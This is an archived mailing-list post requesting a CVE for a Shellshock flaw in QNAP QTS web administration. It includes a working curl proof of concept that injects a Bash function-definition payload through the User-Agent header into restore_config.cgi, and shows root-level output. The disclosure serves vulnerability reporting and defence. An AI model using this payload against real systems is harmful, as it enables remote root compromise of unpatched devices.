Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 29 Sep 2014 09:49:42 +0800
From: Ken Lee <>
Subject: CVE request: QNAP QTS


QNAP QTS [1] employ Bash as the default shell and we discover an arbitrary
code execution flaw with UID=0 via `Web administration'.
The PoC is shown as below:

> $ curl -A '() { :;}; echo Content-Type: text/html; echo; echo
> `/usr/bin/id`' http://QNAP_QTS:8080/cgi-bin/restore_config.cgi
> *uid=0(admin) gid=0(administrators)*
> HTTP/1.1 200 OK

{ "authPassed": 1, "Result": 0 }

This issue has been acknowledged [2] by QNAP and if not assigned yet,
please help to arrange a CVE identifier for this issue.
Thank you, and have a nice day.


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ